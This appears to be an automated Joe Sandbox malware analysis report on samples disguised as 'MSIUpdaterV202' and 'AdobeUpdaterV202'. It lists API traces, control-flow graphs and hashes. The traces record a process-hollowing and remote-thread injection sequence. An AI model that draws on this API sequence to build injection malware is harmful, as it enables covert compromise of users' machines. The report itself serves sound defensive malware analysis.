                                                                                                                                              execution_graph 351 c60e77 354 c60e1c 351->354 352 c60f9b VirtualProtect 353 c60fd8 352->353 354->352 355 c60f2a 354->355 307 c60960 314 c60a31 307->314 308 c60a11 309 c609a0 309->308 320 c604f4 309->320 315 c60c65 314->315 316 c60a6a 314->316 315->309 316->315 317 c60f9b VirtualProtect 316->317 319 c60f2a 316->319 318 c60fd8 317->318 318->309 319->309 321 c60f50 VirtualProtect 320->321 323 c609e3 321->323 323->308 324 c60500 323->324 325 c61018 CreateRemoteThread 324->325 327 c610c3 325->327 327->308 328 c60970 329 c609a0 328->329 334 c60a31 VirtualProtect 328->334 330 c604f4 VirtualProtect 329->330 333 c60a11 329->333 331 c609e3 330->331 332 c60500 CreateRemoteThread 331->332 331->333 332->333 334->329 342 c61011 343 c61066 CreateRemoteThread 342->343 345 c610c3 343->345 346 c604df 347 c604e6 VirtualProtect 346->347 349 c60544 346->349 350 c60fd8 347->350 335 2832579 336 28325b1 335->336 336->336 337 28326bf CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 336->337 337->336 338 283278e WriteProcessMemory 337->338 339 28327d3 338->339 340 2832815 WriteProcessMemory Wow64SetThreadContext ResumeThread 339->340 341 28327d8 WriteProcessMemory 339->341 341->339

                                                                                                                                              Callgraph

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 028326E8
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 028326FB
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02832719
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0283273D
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02832768
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 028327C0
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0283280B
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02832849
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 02832885
                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 02832894
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1858269210.0000000002832000.00000040.00000800.00020000.00000000.sdmp, Offset: 02832000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_2832000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                              • String ID: GetP$Load$aryA$ress
                                                                                                                                              • API String ID: 2687962208-977067982
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1857875694.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_c60000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03833584,?,?,?), ref: 00C60FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1857875694.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_c60000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 00C610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1857875694.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_c60000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 00C610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1857875694.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_c60000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03833584,?,?,?), ref: 00C60FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1857875694.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_c60000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:41.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:44
                                                                                                                                              Total number of Limit Nodes:1

                                                                                                                                              Callgraph

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 027326E8
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027326FB
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02732719
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0273273D
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02732768
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 027327C0
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0273280B
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02732849
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 02732885
                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 02732894
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.1858507920.0000000002732000.00000040.00000800.00020000.00000000.sdmp, Offset: 02732000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2732000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                              • String ID: GetP$Load$aryA$ress
                                                                                                                                              • API String ID: 2687962208-977067982
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03733584,?,?,?), ref: 00D10FC9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.1858221420.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_d10000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 544645111-4108050209
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 113 d10500-d11072 116 d11082-d110c1 CreateRemoteThread 113->116 117 d11074-d11080 113->117 118 d110c3-d110c9 116->118 119 d110ca-d110de 116->119 117->116 118->119
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 00D110B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.1858221420.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_d10000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 788fd4cd3ca4f64ffec6eda90f32cf5ddf7cb4d127c233ef3c9aba02266a37bb
                                                                                                                                              • Instruction ID: 1947a97224a38688d2281e00046561d5f5d8084826b6389710efabe7da74d827
                                                                                                                                              • Opcode Fuzzy Hash: 788fd4cd3ca4f64ffec6eda90f32cf5ddf7cb4d127c233ef3c9aba02266a37bb
                                                                                                                                              • Instruction Fuzzy Hash: D23104B5D00249EFCB10CF9AD984ADEBBF5FB48310F208029E918A7350D775A994CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 121 d11011-d11072 123 d11082-d110c1 CreateRemoteThread 121->123 124 d11074-d11080 121->124 125 d110c3-d110c9 123->125 126 d110ca-d110de 123->126 124->123 125->126
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 00D110B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.1858221420.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_d10000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 202800d389b836c58898f4ade429c3a6bd252c7d012b2bcdf8171048868d1797
                                                                                                                                              • Instruction ID: cfb22f49291a8afb2bc81f5f32c51cd5821d989905d20de96efd53733877057b
                                                                                                                                              • Opcode Fuzzy Hash: 202800d389b836c58898f4ade429c3a6bd252c7d012b2bcdf8171048868d1797
                                                                                                                                              • Instruction Fuzzy Hash: 0031F2B5900289EFCB10CF99D984ADEBBF1BB48314F208029E959A7250D375A990CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 128 d104f4-d10fd6 VirtualProtect 131 d10fd8-d10fde 128->131 132 d10fdf-d11000 128->132 131->132
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03733584,?,?,?), ref: 00D10FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.1858221420.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_d10000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: a4340eb0180d2935c31212a15fd75bb887d3e09315252665fbd53e644dc35c0d
                                                                                                                                              • Instruction ID: 0e2ccc8b9e5c8d95d59ce72a5384da2b361836f4afe90d595ca1de65bad94ddd
                                                                                                                                              • Opcode Fuzzy Hash: a4340eb0180d2935c31212a15fd75bb887d3e09315252665fbd53e644dc35c0d
                                                                                                                                              • Instruction Fuzzy Hash: 4E21E7B5901219AFCB10DF9AD885BDEFBB4FF08310F10812AE558A7250D7B4A994CBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Callgraph

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02C62778
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02C6278B
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02C627A9
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02C627CD
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02C627F8
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02C62850
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02C6289B
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02C628D9
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 02C62915
                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 02C62924
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974437145.0000000002C62000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C62000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2c62000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                              • String ID: GetP$Load$aryA$ress
                                                                                                                                              • API String ID: 2687962208-977067982
                                                                                                                                              • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction ID: ad82d3f38fd65e8f82cc31928f2a42cb0663f21147878687094c6c87762fa4e6
                                                                                                                                              • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction Fuzzy Hash: A2B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB341D774FA518B94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974295700.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2a60000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              • Opcode ID: 95a84aaa5736c2d639be0550cb87fa331d2a921abe0953e96403bedb05cb9f32
                                                                                                                                              • Instruction ID: eff619e2a576bfa72e605d914d5dac78847e296e1d6e3d506b1ab6c18c0a7dc1
                                                                                                                                              • Opcode Fuzzy Hash: 95a84aaa5736c2d639be0550cb87fa331d2a921abe0953e96403bedb05cb9f32
                                                                                                                                              • Instruction Fuzzy Hash: 77127C31A002958FCB05CFA9C484AADFFB2BF49314F59C595E498AB252CB30FD85CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 108 2a604df-2a604e4 109 2a604e6-2a60fd6 VirtualProtect 108->109 110 2a60544-2a6084e 108->110 118 2a60fdf-2a61000 109->118 119 2a60fd8-2a60fde 109->119 111 2a60850-2a60852 110->111 112 2a60878-2a608bb 110->112 124 2a60854 call 2a60960 111->124 125 2a60854 call 2a60970 111->125 116 2a6085a 119->118 124->116 125->116
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03C63584,?,?,?), ref: 02A60FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974295700.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2a60000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: fca98933b1499005337ef9b7b0b17c3fb8b2d7bce928524d371618610e3f2380
                                                                                                                                              • Instruction ID: e557ed4e62027f9a1c03b63386275869f85d335a4522c8f946b0931fab94a87f
                                                                                                                                              • Opcode Fuzzy Hash: fca98933b1499005337ef9b7b0b17c3fb8b2d7bce928524d371618610e3f2380
                                                                                                                                              • Instruction Fuzzy Hash: 5441ADB1D052889FCB01DFA9D9946EEFFF0FF49310F1480AAE488A7251D7749949CBA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 126 2a60500-2a61072 129 2a61074-2a61080 126->129 130 2a61082-2a610c1 CreateRemoteThread 126->130 129->130 131 2a610c3-2a610c9 130->131 132 2a610ca-2a610de 130->132 131->132
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 02A610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974295700.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2a60000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 5682bc69776fd96827a881230b062dcf7d28dc59f1eab5a797962d55526ecf46
                                                                                                                                              • Instruction ID: a01a72e47247ad643428e1b88ae49f9aabc54fb69f00d7f546c0d3629f7b9933
                                                                                                                                              • Opcode Fuzzy Hash: 5682bc69776fd96827a881230b062dcf7d28dc59f1eab5a797962d55526ecf46
                                                                                                                                              • Instruction Fuzzy Hash: 9F31D3B5900289DFCF10CF9AD984ADEBBF4FB48314F10802AE959A7350D775A950CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 134 2a61011-2a61072 136 2a61074-2a61080 134->136 137 2a61082-2a610c1 CreateRemoteThread 134->137 136->137 138 2a610c3-2a610c9 137->138 139 2a610ca-2a610de 137->139 138->139
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 02A610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974295700.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2a60000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 3c9e5e988de49738e4726ac80c27d7c41958d0b0a4c94bbf00c7e99dd35a1e44
                                                                                                                                              • Instruction ID: a8fd3e596ec27919979f3e153af5241bb0b425767bd57a2afe55d8143e7b349a
                                                                                                                                              • Opcode Fuzzy Hash: 3c9e5e988de49738e4726ac80c27d7c41958d0b0a4c94bbf00c7e99dd35a1e44
                                                                                                                                              • Instruction Fuzzy Hash: 1331E0B59012899FCF10CFA9D984AEEBFF1FB48314F208029E958A7210D375A950CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03C63584,?,?,?), ref: 02A60FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1974295700.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_2a60000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 46cde1b0fc57fa7561fbec23d652820171f226c42e7da53e3f10446e5387c49d
                                                                                                                                              • Instruction ID: d9877674eaaab056ff2bebbd1229fa25da20d06598b42304ba0b5ab7f4c6d270
                                                                                                                                              • Opcode Fuzzy Hash: 46cde1b0fc57fa7561fbec23d652820171f226c42e7da53e3f10446e5387c49d
                                                                                                                                              • Instruction Fuzzy Hash: F22118B1901219DFCB00CF9AC884BDEFBF4FB08310F10812AE558A7240D374A954CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Callgraph

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 03352778
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0335278B
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 033527A9
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 033527CD
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 033527F8
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 03352850
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0335289B
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 033528D9
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 03352915
                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 03352924
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2056135649.0000000003352000.00000040.00000800.00020000.00000000.sdmp, Offset: 03352000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_3352000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                              • String ID: GetP$Load$aryA$ress
                                                                                                                                              • API String ID: 2687962208-977067982
                                                                                                                                              • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction ID: d38469f3e7ada88b98162843e1e4196d02fa2fce5612c33ceff1c6b2beb4802e
                                                                                                                                              • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction Fuzzy Hash: 23B1E77660024AAFDB60CF68CC80BDA77A9FF88714F158564EA0CEB341D774FA518B94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2055087637.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_1590000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              • Opcode ID: 3799603b921bc716e7eeeb6004ad3be49367a1e78a84f205e4819beca77e1c83
                                                                                                                                              • Instruction ID: 6d48939197543453764c7e09bb71b8b65e7a7772bbd2261fdb9b688cbdd57978
                                                                                                                                              • Opcode Fuzzy Hash: 3799603b921bc716e7eeeb6004ad3be49367a1e78a84f205e4819beca77e1c83
                                                                                                                                              • Instruction Fuzzy Hash: 56128C319002558FCB06CF69C480AADFBF6BF49310F59C599E458AB292C734FD81CBA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(04353584,?,?,?), ref: 01590FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2055087637.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_1590000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 598a1a21eaa06c81a61052d9643748b3ea92867a1a0b0a4a60e8a97af6e0724d
                                                                                                                                              • Instruction ID: 84842b6a4549aaf4d868cf1f97454e84c4d3628a1de5f9f997d82a9067390297
                                                                                                                                              • Opcode Fuzzy Hash: 598a1a21eaa06c81a61052d9643748b3ea92867a1a0b0a4a60e8a97af6e0724d
                                                                                                                                              • Instruction Fuzzy Hash: 7D216B718052599FCB00DF99C884ADEFBF8FF09320F10856AE958A7251D378A945CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 015910B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2055087637.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_1590000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 06112d690ceca2f481c6546f422c39bef72977cb5c7e6aca456956c79114cae4
                                                                                                                                              • Instruction ID: f3d076fcd50077304ba39944f38606808e3336d654f793c10b8f1c11054aacd1
                                                                                                                                              • Opcode Fuzzy Hash: 06112d690ceca2f481c6546f422c39bef72977cb5c7e6aca456956c79114cae4
                                                                                                                                              • Instruction Fuzzy Hash: 9331E2B5900249DFCF10CF99D984ADEBFF5FB48320F20842AE959A7250D375A950CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 015910B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2055087637.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_1590000_AdobeUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 06c7d39843a6cb5cbbcdf7305366ff435204e113f3c76fb8bbaa1dc330002df6
